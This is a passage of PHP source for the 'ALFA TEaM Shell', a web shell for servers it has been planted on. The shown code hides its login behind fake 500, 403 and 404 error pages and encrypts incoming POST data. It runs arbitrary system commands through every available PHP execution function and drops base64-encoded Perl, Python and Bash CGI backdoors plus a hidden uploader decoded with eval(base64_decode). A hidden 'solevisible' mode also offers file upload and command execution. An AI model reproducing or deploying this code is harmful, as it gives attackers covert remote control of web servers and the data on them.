<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
<div id=loginbox><p><font face="verdana,arial" size=-1>
<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
</div><br /></center>';
exit;
}
}elseif($config['AlfaLoginPage']=='500'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='403'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='404'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}
}
function decrypt_post($str, $pwd){
	if(__ALFA_POST_ENCRYPTION__){
		$pwd     = __ZW5jb2Rlcg($pwd);
		$str     = __ZGVjb2Rlcg($str);
		$enc_chr = "";
		$enc_str = "";
		$i       = 0;
		while ($i < strlen($str)) {
			for ($j = 0; $j < strlen($pwd); $j++) {
				$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
				$enc_str .= $enc_chr;
				$i++;
				if ($i >= strlen($str))
					break;
			}
		}
		return __ZGVjb2Rlcg($enc_str);
	}else{
		return __ZGVjb2Rlcg($str);
	}
}

function _AlfaSecretKey(){
	if(!isset($_SESSION["AlfaSecretKey"])){
		$_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
	}
	return $_SESSION["AlfaSecretKey"];
}
function alfa_getColor($target){
	if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
		return $GLOBALS["DB_NAME"]["color"][$target];
	}else{
		$target = $GLOBALS["__ALFA_COLOR__"][$target];
		if(is_array($target)){
			return $target["key_color"];
		}else{
			return $target;
		}
	}
}
function alfaCssLoadColors(){
	$css = "";
	foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
		if(!is_array($value)){
			$value = alfa_getColor($key);
			$css .= ".{$key}{color: {$value};}";
		}else{
			if(isset($value["multi_selector"])){
				foreach($value["multi_selector"] as $k => $v){
					$color = alfa_getColor($key);
					$code = str_replace("{color}", $color, $v);
					$css .=  $k."{".$code."}";
				}
			}
		}
	}
	return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}}
function _alfa_cgicmd($cmd,$lang="perl"){
	if(isset($_SESSION["alfacgiapi_mode"])){
		return "";
	}
	$cmd_pure = $cmd;
	$is_curl = function_exists('curl_version');
	$is_socket = function_exists('fsockopen');
	if($is_curl||$is_socket){
		$recreate = false;
		if(isset($_SESSION["alfacgiapi"])){
			if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
				$recreate = true;
				$lang = $_SESSION["alfacgiapi"];
			}
		}
		if(!isset($_SESSION["alfacgiapi"])||$recreate){
			@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
			$perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
			$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
			$bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
			if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
			alfaWriteTocgiapi($lang.".alfa",$source);
			alfacgihtaccess('cgi', "alfacgiapi/");
		}else{
			$lang = $_SESSION["alfacgiapi"];
		}
		$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
		if($is_curl){
			$address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
			$post = new AlfaCURL();
			$data = $post->Send($address, "post", $cmd);
		}elseif($is_socket){
			$server = $_SERVER["SERVER_NAME"];
			$uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
			$data = _alfa_fsockopen($server,$uri,$cmd);
		}
		$out = "";
		if(strstr($data, "[solevisible~api]")){
			$_SESSION["alfacgiapi"] = $lang;
			if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
				$out = $res[1];
			}
		}elseif($lang=="perl"){
			return _alfa_cgicmd($cmd_pure,"py");
		}elseif($lang=="py"){
			return _alfa_cgicmd($cmd_pure,"bash");
		}else{
			$_SESSION["alfacgiapi_mode"] = "off";
		}
		return trim($out);
	}else{
		return "";
	}
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
	$data = _alfa_php_cmd($in,$re);
	if(empty($data)&&$cgi||$all){
		if($GLOBALS['sys']=='unix'){
			if(strlen(_alfa_php_cmd("whoami"))==0||$all){
				$cmd = _alfa_cgicmd($in);
				if(!empty($cmd)){
					return $cmd;
				}
			}
		}
	}
	return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
	$socket = @fsockopen($server, 80, $errno, $errstr, 15);
	if($socket){
		$http  = "POST {$uri} HTTP/1.0\r\n";
		$http .= "Host: {$server}\r\n";
		$http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
		$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$http .= "Content-length: " . strlen($post) . "\r\n";
		$http .= "Connection: close\r\n\r\n";
		$http .= $post . "\r\n\r\n";
		fwrite($socket, $http);
		$contents = "";
		while (!@feof($socket)) {
			$contents .= @fgets($socket, 4096);
		}
		list($header, $body) = explode("\r\n\r\n", $contents, 2);
		@fclose($socket);
		return $body;
	}else{
		return "";
	}
}
if(isset($_GET["solevisible"])){
@error_reporting(E_ALL ^ E_NOTICE);
echo '<html>';
echo "<title>Solevisible Hidden Shell</title>";
echo "<body bgcolor=#000000>";
echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
echo "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";
echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
echo"<font color=#7CFC00>Disable functions : </font>";
$disfun = @ini_get('disable_functions');
if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
echo"<font color=red>";
echo "$disfun";
echo"</font><br>";
echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
if(isset($_FILES['file'])){
if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
}
echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
<hr><pre>';
if(isset($_POST['command_solevisible'])){
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
}
echo'</pre>
</body></html>';
exit;}
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')){
@set_magic_quotes_runtime(0);
}
foreach($_POST as $key => $value){
if(is_array($_POST[$key])){
$i=0;
foreach($_POST[$key] as $f) {
$f = trim(str_replace(' ', '+',$f));
$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
$i++;
}
}else{
$value = trim(str_replace(' ', '+',$value));
$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
}
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(strtolower(substr(PHP_OS,0,3))=="win")
$GLOBALS['sys']='win';
else
$GLOBALS['sys']='unix';
$GLOBALS['home_cwd'] = @getcwd();
if($_POST["a"] != "GetPathHistory"){
	if($_SESSION[__LAST_CWD__]!=$_POST['c']){
		$_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
	}
}
$GLOBALS["need_to_update_header"] = "false";
if(isset($_POST['c'])){
if(!@chdir($_POST['c'])){
	$GLOBALS['glob_chdir_false'] = true;
}
}
$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
if($GLOBALS['sys'] == 'win'){
$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
}
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
function alfahead(){
if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
if(!isset($_POST['ajax'])){
function Alfa_GetDisable_Function(){
$disfun = @ini_get('disable_functions');
$afa = '<span class="header_show_all">All Functions Accessible</span>';
if(empty($disfun))return($afa);
$s = explode(',',$disfun);
$s = array_unique($s);
$i=0;
$b=0;
$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
$black_list = array();
$allow_list = array();
foreach($s as $d){
	$d=trim($d);
	if(empty($d)||!is_callable($d))continue;
	if(!function_exists($d)){
		if(in_array($d,$func)){
			$dis .= $d." | ";$b++;
			$black_list[] = $d;
		}else{
			$allow_list[] = $d;
		}
		$i++;
	}
}
if($i==0)return($afa);
if($i <= count($func)){
$all = array_values(array_merge($black_list, $allow_list));
return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
}
return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
}
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
$totalSpace = $totalSpace?$totalSpace:1;
$on="<span class='header_on'> ON </span>";
$of="<span class='header_off'> OFF </span>";
$none="<span class='header_none'> NONE </span>";
if(function_exists('ssh2_connect'))
$ssh2=$on;
else
$ssh2=$of;
if(function_exists('curl_version'))
$curl=$on;
else
$curl=$of;
if(function_exists('mysql_get_client_info'))
$mysql=$on;
else
$mysql=$of;
if(function_exists('mssql_connect'))
$mssql=$on;
else
$mssql=$of;
if(function_exists('pg_connect'))
$pg=$on;
else
$pg=$of;
if(function_exists('oci_connect'))
$or=$on;
else
$or=$of;
if(@ini_get('disable_functions'))
$disfun=@ini_get('disable_functions');
else
$disfun="All Functions Enable";
if(@ini_get('safe_mode'))
$safe_modes="<span class='header_off'>ON</span>";
else
$safe_modes="<span class='header_on'>OFF</span>";
$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
if(@ini_get('open_basedir')){
$basedir_data = @ini_get('open_basedir');
if(strlen($basedir_data)>120){
$open_b=substr($basedir_data,0, 120)."...";
}else{
$open_b = $basedir_data;
}
}else{$open_b=$none;}
if(@ini_get('safe_mode_exec_dir'))
$safe_exe=@ini_get('safe_mode_exec_dir');
else
$safe_exe=$none;
if(@ini_get('safe_mode_include_dir'))
$safe_include=@ini_get('safe_mode_include_dir');
else
$safe_include=$none;
if(!function_exists('posix_getegid'))
{
$user = function_exists("get_current_user")?@get_current_user():"????";
$uid = function_exists("getmyuid")?@getmyuid():"????";
$gid = function_exists("getmygid")?@getmygid():"????";
$group = "?";
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$drives = "";
foreach(range('a','z') as $drive)
if(@is_dir($drive.':\\'))
$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
$csscode ='	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
<style type="text/css">
.hlabale {
    color: #67ABDF;
    border-radius: 4px;
    border: 1px solid #27979B;
    margin-left: 7px;
    padding: 2px;
}
#tbl_sympphp tr {
	text-align: center;
}
.editor-view {
	position: relative;
}
.view-content {
	position: absolute;
	overflow-y: auto;
	width: 100%;
	height: 475px;
}
*::-webkit-scrollbar-track {
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
	border-radius: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar{
	width: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar-thumb {
	border-radius: 10px;
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
	background-color: rgb(30, 130, 181);
}
.editor-file-name {
	margin-left: 29px;
	margin-top: 4px;
	overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}
.editor-icon {
	position: absolute;
}
.is_active {
	background: rgba(49, 55, 93, 0.77);
	border-radius: 10px;
}
.history-list {
	height: 88%;
	overflow-y: auto;
}
#editor-minimized,#cgiloader-minimized {
	display: block;
	position: fixed;
	right: -30px;
	width: 30px;
	height: 30px;
	top: 30%;
}
.minimized-wrapper {
	position: relative;
	background: rgb(14, 48, 74);
    width: 44px;
    height: 167px;
	cursor: pointer;
	border-bottom-left-radius: 5px;
	border-top-left-radius: 5px;
}
.minimized-text {
    transform: rotate(-90deg);
    color: wheat;
    font-size: x-large;
    display: inline-block;
    position: absolute;
    right: -51px;
    width: 129px;
    top: 50px;
    border-top-left-radius: 4%;
    height: 56px;
    padding: 3px
}
.close-button,.editor-minimize {
	height: 26px;
    width: 38px;
    right: 7px;
    background: rgb(29, 86, 115);
    cursor: pointer;
    position: absolute;
    box-sizing: border-box;
    line-height: 50px;
    display: inline-block;
    top: 17px;
    border-radius: 100px;
}
.editor-minimize {right: 50px;}
.close-button:before,.close-button:after,.editor-minimize:before {
	transform: rotate(-45deg);
    content: "";
    position: absolute;
    top: 63%;
    right: 6px;
    margin-top: -5px;
    margin-left: -25px;
    display: block;
    height: 4px;
    width: 27px;
    background-color: rgba(216, 207, 207, 0.75);
    transition: all 0.25s ease-out;
}
.editor-minimize:before{
	transform: rotate(0deg);
}
.close-button:after {
  transform: rotate(-135deg);
}
.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
	background-color: red;
}
.close-button:hover,.editor-minimize:hover{
	background-color: rgba(39, 66, 80, 0.96);
}
#editor,#cgiloader {
	display: none;
	position: fixed;
    top: 0;
	width: 100%;
	height: 100%;
}
.editor-wrapper {
	width: 100%;
    height: 100%;
    position: relative;
    top: 1%;
}
.editor-header {
	width: 97%;
    background: rgba(21, 66, 88, 0.93);
    height: 37px;
    margin-left: 13px;
    position: relative;
	border-top-left-radius: 15px;
	border-top-right-radius: 15px;
}
.editor-path {
	position: absolute;
    font-size: x-large;
    margin-left: 10px;
    top: 6px;
    color: springgreen;
}
.editor-modal {
    position: relative;
    top: 0;
    background-color: rgba(0, 1, 23, 0.95);
    height: 90%;
    margin-left: 20%;
    margin-right: 2%;
    border: 2px #0e304a solid;
}
.editor-explorer {
    width: 19%;
    height: 90%;
    background-color: rgba(0, 1, 23, 0.94);
    position: absolute;
    z-index: 2;
    left: 1%;
    border: 2px rgb(14, 48, 74) solid;
}
.editor-controller {
	position: relative;
	top: -13px;
}
.file-holder {
	position: relative;
    width: 100%;
    height: 30px;
}
.file-holder > .history {
	position: absolute;
    color: rgb(3, 179, 163);
    cursor: pointer;
	left:5px;
    font-size: 18px;
    font-family: sans-serif;
	width:89%;
	height:100%;
	z-index: 3;
	border-radius: 10px;
	transition: background-color 600ms ease-out;
}
.file-holder > .history-close {
	display: block;
    opacity: 0;
    position: absolute;
    right: 2px;
